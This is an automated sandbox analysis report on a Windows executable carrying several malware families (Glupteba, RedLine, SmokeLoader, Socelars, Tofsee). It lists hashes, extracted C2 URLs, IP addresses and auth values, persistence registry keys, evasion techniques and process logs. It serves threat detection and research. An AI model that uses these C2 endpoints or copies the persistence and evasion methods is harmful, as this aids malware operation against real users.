glupteba | 01fbd3a5bc12c7ffb70db17a1b4d672cdeeffc2816ed9cc8bb854dc75e2459f2

Analysis

max time kernel
102s
max time network
167s
platform
windows10-2004_x64
resource
win10v2004-en-20220113
submitted
23-02-2022 01:05

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

01fbd3a5bc12c7ffb70db17a1b4d672cdeeffc2816ed9cc8bb854dc75e2459f2.exe
Size

7.7MB
MD5

5f73ecdc703e35f0d7be6a5e94ee9248
SHA1

d79aa185f7c4d8434052abbd24be972341ead62a
SHA256

01fbd3a5bc12c7ffb70db17a1b4d672cdeeffc2816ed9cc8bb854dc75e2459f2
SHA512

0e132bd182c1de993b16cedd81cf6539dcd5d8cf02fcfc4b76a5e7c93740e264ff1c991fb3b3265946ac96dc2b88e5f17d847324634c5dbc978f2bd207c562d4

Score

10^/10

glupteba metasploit onlylogger redline smokeloader socelars tofsee 333333 backdoor discovery dropper evasion infostealer loader persistence spyware stealer trojan upx

Malware Config

Extracted

Family

socelars

http://www.iyiqian.com/

http://www.xxhufdc.top/

http://www.uefhkice.xyz/

http://www.fcektsy.top/

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

smokeloader

Version

2020

http://varmisende.com/upload/

http://fernandomayol.com/upload/

http://nextlytm.com/upload/

http://people4jan.com/upload/

http://asfaltwerk.com/upload/

rc4.i32

Extracted

Family

tofsee

patmushta.info

ovicrush.cn

Extracted

Family

redline

193.178.170.120:11930

Attributes

auth_value
55d90151e4c2499c8ceb7f45dd22dc92

Extracted

Family

redline

Botnet

333333

2.56.57.212:13040

Attributes

auth_value
3efa022bc816f747304fd68e5810bb78

Signatures

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba Payload 4 IoCs

Processes:

resource	yara_rule
behavioral2/memory/1536-168-0x0000000002CF0000-0x0000000003617000-memory.dmp	family_glupteba
behavioral2/memory/1536-169-0x0000000000400000-0x0000000000D42000-memory.dmp	family_glupteba
behavioral2/memory/3976-173-0x0000000000400000-0x0000000000D42000-memory.dmp	family_glupteba
behavioral2/memory/4820-182-0x0000000000400000-0x0000000000D42000-memory.dmp	family_glupteba

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
OnlyLogger
A tiny loader that uses IPLogger to get its payload.
loader onlylogger
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 20 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4176-212-0x0000000000D10000-0x0000000000F41000-memory.dmp	family_redline
behavioral2/memory/4176-224-0x0000000000D12000-0x0000000000D48000-memory.dmp	family_redline
behavioral2/memory/4176-232-0x0000000000D12000-0x0000000000D48000-memory.dmp	family_redline
behavioral2/memory/4176-237-0x0000000000D10000-0x0000000000F41000-memory.dmp	family_redline
behavioral2/memory/4176-238-0x0000000000D10000-0x0000000000F41000-memory.dmp	family_redline
behavioral2/memory/2352-241-0x0000000000A60000-0x0000000000B54000-memory.dmp	family_redline
behavioral2/memory/2400-244-0x0000000000AB0000-0x0000000000C67000-memory.dmp	family_redline
behavioral2/memory/2400-259-0x0000000000AB2000-0x0000000000AE7000-memory.dmp	family_redline
behavioral2/memory/2352-269-0x0000000000A62000-0x0000000000A95000-memory.dmp	family_redline
behavioral2/memory/2352-261-0x0000000000A60000-0x0000000000B54000-memory.dmp	family_redline
behavioral2/memory/2352-258-0x0000000000A60000-0x0000000000B54000-memory.dmp	family_redline
behavioral2/memory/2352-243-0x0000000000A60000-0x0000000000B54000-memory.dmp	family_redline
behavioral2/memory/2400-242-0x0000000000AB0000-0x0000000000C67000-memory.dmp	family_redline
behavioral2/memory/2400-275-0x0000000000AB0000-0x0000000000C67000-memory.dmp	family_redline
behavioral2/memory/1404-316-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral2/memory/5168-318-0x0000000000640000-0x000000000073C000-memory.dmp	family_redline
behavioral2/memory/5588-336-0x0000000000020000-0x0000000000127000-memory.dmp	family_redline
behavioral2/memory/4000-337-0x0000000000020000-0x0000000000127000-memory.dmp	family_redline
behavioral2/memory/6596-365-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral2/memory/1832-368-0x0000000003B00000-0x0000000003B2F000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars Payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Install.exe	family_socelars
C:\Users\Admin\AppData\Local\Temp\Install.exe	family_socelars

Suspicious use of NtCreateProcessExOtherParentProcess 3 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exe

description	pid	process	target process
PID 2404 created 748	2404	WerFault.exe	md9_1sjm.exe
PID 1252 created 1832	1252	WerFault.exe	FUHfCYkZkHsvnaBOFezci_VP.exe
PID 5140 created 3496	5140	WerFault.exe	rH8MYFkGOLLATkR32GhOKCql.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs

Processes:

svchost.exe

description pid process target process

PID 1520 created 1536 1520 svchost.exe Graphics.exe
PID 1520 created 4820 1520 svchost.exe csrss.exe
Tofsee
Backdoor/botnet which carries out malicious activities based on commands from a C2 server.
trojan tofsee

description	pid	process	target process
PID 1520 created 1536	1520	svchost.exe	Graphics.exe
PID 1520 created 4820	1520	svchost.exe	csrss.exe

OnlyLogger Payload 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/3496-267-0x00000000035B0000-0x00000000035F4000-memory.dmp	family_onlylogger
behavioral2/memory/3496-268-0x0000000000400000-0x0000000000447000-memory.dmp	family_onlylogger

Creates new service(s) 1 TTPs
persistence

New Service
T1050
Downloads MZ/PE file

Executes dropped EXE 50 IoCs

Processes:

SoCleanInst.exemd9_1sjm.exeFolder.exeGraphics.exeUpdbdate.exeInstall.exeFiles.exepub2.exeFile.exejfiag3g_gg.exejfiag3g_gg.exeGraphics.execsrss.exeW1_pEOkwX0ho7sTdp8HsZAP2.exerlX816mGw7kZIFzacSmBmJ7e.exegzS6rbGPU1EZPQTUVLMrn7q5.exerH8MYFkGOLLATkR32GhOKCql.exeKiKAQzH09soNbMxVpQFOq7RX.exeGwO_2OM7gbGEaJk9mFQFWpc1.exe_KEy8rORV47kA2jvlkhTj5sm.exeFUHfCYkZkHsvnaBOFezci_VP.exerKvFY6CnHWie444hMUObNLtV.exeJaDEtlapSjxxI_ZqyH4MFcfS.exeFCLlb7XZEV2HcE0uHejczRnm.exeSFjFVmkKnSoShKKFwn566opt.exeixZcamiQqZPrcGOTEY9nRZ0R.exeUpIyVDbOzGsU86jzSDuT704v.exeO2FQ_zwITlykcrCcg9eOnm_b.exeinjector.exeinjector.exeinjector.exen_fNQt5nNovTFAQa682C7pDy.exed9H1uWQsKmp1oDDDLkKcqRF1.exepkw4sC1xj9comutOSMhYswPi.exeZ4ZSlXNomGbScV2GJAGzQd_0.exeo3QZyGTuOh0dnMxFZ66zTodT.exeVvt51hX9LGs41wRt6jjl79A9.execcl7mJzQxh24f91pr8C8K0zf.exeeXbyB37rZ0OaYLSf9eU33wGD.exerKvFY6CnHWie444hMUObNLtV.tmpCUiVm5CZ74ksoLUi1daJiVmQ.exei80S_6Pl5Xx0wyEndZkCZyhk.exengrb4QAhKGaZvpKVZrEs7TAt.exeX6GTYiWjljlO4KO4OWfN7Ht5.exeGwO_2OM7gbGEaJk9mFQFWpc1.exemFY23IUwQNj7co79jeBsFtUh.exe_j715KV6HxAdfmV1xLwXzyuT.exemFY23IUwQNj7co79jeBsFtUh.tmpO2FQ_zwITlykcrCcg9eOnm_b.exeInstall.exe

pid	process
1656	SoCleanInst.exe
748	md9_1sjm.exe
4332	Folder.exe
1536	Graphics.exe
1776	Updbdate.exe
3964	Install.exe
3024	Files.exe
3152	pub2.exe
3644	File.exe
4864	jfiag3g_gg.exe
4300	jfiag3g_gg.exe
3976	Graphics.exe
4820	csrss.exe
908	W1_pEOkwX0ho7sTdp8HsZAP2.exe
5100	rlX816mGw7kZIFzacSmBmJ7e.exe
5012	gzS6rbGPU1EZPQTUVLMrn7q5.exe
3496	rH8MYFkGOLLATkR32GhOKCql.exe
4176	KiKAQzH09soNbMxVpQFOq7RX.exe
2588	GwO_2OM7gbGEaJk9mFQFWpc1.exe
4408	_KEy8rORV47kA2jvlkhTj5sm.exe
1832	FUHfCYkZkHsvnaBOFezci_VP.exe
4168	rKvFY6CnHWie444hMUObNLtV.exe
4840	JaDEtlapSjxxI_ZqyH4MFcfS.exe
3092	FCLlb7XZEV2HcE0uHejczRnm.exe
2244	SFjFVmkKnSoShKKFwn566opt.exe
2804	ixZcamiQqZPrcGOTEY9nRZ0R.exe
4812	UpIyVDbOzGsU86jzSDuT704v.exe
1472	O2FQ_zwITlykcrCcg9eOnm_b.exe
4160	injector.exe
4700	injector.exe
2132	injector.exe
3492	n_fNQt5nNovTFAQa682C7pDy.exe
4180	d9H1uWQsKmp1oDDDLkKcqRF1.exe
2400	pkw4sC1xj9comutOSMhYswPi.exe
544	Z4ZSlXNomGbScV2GJAGzQd_0.exe
2284	o3QZyGTuOh0dnMxFZ66zTodT.exe
2240	Vvt51hX9LGs41wRt6jjl79A9.exe
1992	ccl7mJzQxh24f91pr8C8K0zf.exe
2352	eXbyB37rZ0OaYLSf9eU33wGD.exe
1624	rKvFY6CnHWie444hMUObNLtV.tmp
1456	CUiVm5CZ74ksoLUi1daJiVmQ.exe
2548	i80S_6Pl5Xx0wyEndZkCZyhk.exe
2260	ngrb4QAhKGaZvpKVZrEs7TAt.exe
5008	X6GTYiWjljlO4KO4OWfN7Ht5.exe
116	GwO_2OM7gbGEaJk9mFQFWpc1.exe
5452	mFY23IUwQNj7co79jeBsFtUh.exe
5636	_j715KV6HxAdfmV1xLwXzyuT.exe
5672	mFY23IUwQNj7co79jeBsFtUh.tmp
5852	O2FQ_zwITlykcrCcg9eOnm_b.exe
5892	Install.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

UPX packed file 6 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\Pictures\Adobe Films\FCLlb7XZEV2HcE0uHejczRnm.exe	upx
C:\Users\Admin\Pictures\Adobe Films\FCLlb7XZEV2HcE0uHejczRnm.exe	upx

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

File.exeixZcamiQqZPrcGOTEY9nRZ0R.exerlX816mGw7kZIFzacSmBmJ7e.exe01fbd3a5bc12c7ffb70db17a1b4d672cdeeffc2816ed9cc8bb854dc75e2459f2.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	File.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	ixZcamiQqZPrcGOTEY9nRZ0R.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	rlX816mGw7kZIFzacSmBmJ7e.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	01fbd3a5bc12c7ffb70db17a1b4d672cdeeffc2816ed9cc8bb854dc75e2459f2.exe

Loads dropped DLL 1 IoCs

Processes:

JaDEtlapSjxxI_ZqyH4MFcfS.exe

pid process

4840 JaDEtlapSjxxI_ZqyH4MFcfS.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

pid	process
4840	JaDEtlapSjxxI_ZqyH4MFcfS.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

Files.exeGraphics.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.ex"	Files.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BitterSun = "\"C:\\Windows\\rss\\csrss.exe\""	Graphics.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

md9_1sjm.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md9_1sjm.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

27 ip-api.com
125 ipinfo.io
126 ipinfo.io
277 ipinfo.io
317 ipinfo.io
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs

Processes:

KiKAQzH09soNbMxVpQFOq7RX.exeeXbyB37rZ0OaYLSf9eU33wGD.exepkw4sC1xj9comutOSMhYswPi.exe

pid process

4176 KiKAQzH09soNbMxVpQFOq7RX.exe
2352 eXbyB37rZ0OaYLSf9eU33wGD.exe
2400 pkw4sC1xj9comutOSMhYswPi.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	md9_1sjm.exe

flow	ioc
27	ip-api.com
125	ipinfo.io
126	ipinfo.io
277	ipinfo.io
317	ipinfo.io

pid	process
4176	KiKAQzH09soNbMxVpQFOq7RX.exe
2352	eXbyB37rZ0OaYLSf9eU33wGD.exe
2400	pkw4sC1xj9comutOSMhYswPi.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

GwO_2OM7gbGEaJk9mFQFWpc1.exeO2FQ_zwITlykcrCcg9eOnm_b.exe

description	pid	process	target process
PID 2588 set thread context of 116	2588	GwO_2OM7gbGEaJk9mFQFWpc1.exe	GwO_2OM7gbGEaJk9mFQFWpc1.exe
PID 1472 set thread context of 5852	1472	O2FQ_zwITlykcrCcg9eOnm_b.exe	O2FQ_zwITlykcrCcg9eOnm_b.exe

Drops file in Program Files directory 2 IoCs

Processes:

rlX816mGw7kZIFzacSmBmJ7e.exe

description	ioc	process
File created	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	rlX816mGw7kZIFzacSmBmJ7e.exe
File opened for modification	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	rlX816mGw7kZIFzacSmBmJ7e.exe

Drops file in Windows directory 3 IoCs

Processes:

Graphics.exeWerFault.exe

description	ioc	process
File opened for modification	C:\Windows\rss	Graphics.exe
File created	C:\Windows\rss\csrss.exe	Graphics.exe
File created	C:\Windows\AppCompat\Programs\Amcache.hve.tmp	WerFault.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 64 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
2640	1536	WerFault.exe	Graphics.exe
1756	1536	WerFault.exe	Graphics.exe
3680	1536	WerFault.exe	Graphics.exe
936	1536	WerFault.exe	Graphics.exe
4828	1536	WerFault.exe	Graphics.exe
2432	1536	WerFault.exe	Graphics.exe
4188	1536	WerFault.exe	Graphics.exe
2300	1536	WerFault.exe	Graphics.exe
804	1536	WerFault.exe	Graphics.exe
2348	1536	WerFault.exe	Graphics.exe
1616	1536	WerFault.exe	Graphics.exe
1592	1536	WerFault.exe	Graphics.exe
3908	1536	WerFault.exe	Graphics.exe
4452	1536	WerFault.exe	Graphics.exe
4124	1536	WerFault.exe	Graphics.exe
3720	1536	WerFault.exe	Graphics.exe
1348	1536	WerFault.exe	Graphics.exe
4836	1536	WerFault.exe	Graphics.exe
2976	1536	WerFault.exe	Graphics.exe
960	1536	WerFault.exe	Graphics.exe
1276	1536	WerFault.exe	Graphics.exe
3540	3976	WerFault.exe	Graphics.exe
1968	3976	WerFault.exe	Graphics.exe
3932	3976	WerFault.exe	Graphics.exe
2980	3976	WerFault.exe	Graphics.exe
840	3976	WerFault.exe	Graphics.exe
4124	3976	WerFault.exe	Graphics.exe
3824	3976	WerFault.exe	Graphics.exe
532	3976	WerFault.exe	Graphics.exe
1656	3976	WerFault.exe	Graphics.exe
3640	3976	WerFault.exe	Graphics.exe
2992	3976	WerFault.exe	Graphics.exe
3964	3976	WerFault.exe	Graphics.exe
756	3976	WerFault.exe	Graphics.exe
3208	3976	WerFault.exe	Graphics.exe
628	3976	WerFault.exe	Graphics.exe
3220	3976	WerFault.exe	Graphics.exe
5104	4820	WerFault.exe	csrss.exe
3604	4820	WerFault.exe	csrss.exe
4840	4820	WerFault.exe	csrss.exe
3440	4820	WerFault.exe	csrss.exe
4012	4820	WerFault.exe	csrss.exe
1080	4820	WerFault.exe	csrss.exe
1528	4820	WerFault.exe	csrss.exe
2548	4820	WerFault.exe	csrss.exe
4804	4820	WerFault.exe	csrss.exe
2500	4820	WerFault.exe	csrss.exe
4988	4820	WerFault.exe	csrss.exe
2400	4820	WerFault.exe	csrss.exe
2240	4820	WerFault.exe	csrss.exe
3532	4820	WerFault.exe	csrss.exe
2604	4820	WerFault.exe	csrss.exe
4280	4820	WerFault.exe	csrss.exe
4388	4820	WerFault.exe	csrss.exe
1992	748	WerFault.exe	md9_1sjm.exe
4408	4820	WerFault.exe	csrss.exe
3500	4820	WerFault.exe	csrss.exe
2352	4820	WerFault.exe	csrss.exe
2632	4820	WerFault.exe	csrss.exe
3740	4820	WerFault.exe	csrss.exe
2796	4820	WerFault.exe	csrss.exe
4412	4820	WerFault.exe	csrss.exe
4236	4820	WerFault.exe	csrss.exe
1388	1832	WerFault.exe	FUHfCYkZkHsvnaBOFezci_VP.exe

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

GwO_2OM7gbGEaJk9mFQFWpc1.exepub2.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	GwO_2OM7gbGEaJk9mFQFWpc1.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	GwO_2OM7gbGEaJk9mFQFWpc1.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	GwO_2OM7gbGEaJk9mFQFWpc1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WerFault.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe

Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

1968 schtasks.exe
5712 schtasks.exe
5908 schtasks.exe
5472 schtasks.exe
Enumerates processes with tasklist 1 TTPs 2 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exe

pid process

6860 tasklist.exe
4552 tasklist.exe

pid	process
1968	schtasks.exe
5712	schtasks.exe
5908	schtasks.exe
5472	schtasks.exe

pid	process
6860	tasklist.exe
4552	tasklist.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WerFault.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe

Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

4988 taskkill.exe

pid	process
4988	taskkill.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

Graphics.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-448 = "Azerbaijan Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-741 = "New Zealand Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-281 = "Central Europe Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-721 = "Central Pacific Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2341 = "Haiti Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-362 = "GTB Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-214 = "Pacific Daylight Time (Mexico)"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2321 = "Sakhalin Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1411 = "Syria Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-752 = "Tonga Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-451 = "Caucasus Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-772 = "Montevideo Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1822 = "Russia TZ 1 Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-181 = "Mountain Daylight Time (Mexico)"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-3141 = "South Sudan Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1802 = "Line Islands Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-791 = "SA Western Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1501 = "Turkey Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-131 = "US Eastern Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-842 = "Argentina Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2612 = "Bougainville Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2372 = "Easter Island Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-111 = "Eastern Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2792 = "Novosibirsk Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-72 = "Newfoundland Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2062 = "North Korea Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-241 = "Samoa Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-3142 = "South Sudan Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1412 = "Syria Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-104 = "Central Brazilian Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-112 = "Eastern Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-342 = "Egypt Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-432 = "Iran Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1912 = "Russia TZ 10 Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2392 = "Aleutian Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2432 = "Cuba Standard Time"	Graphics.exe
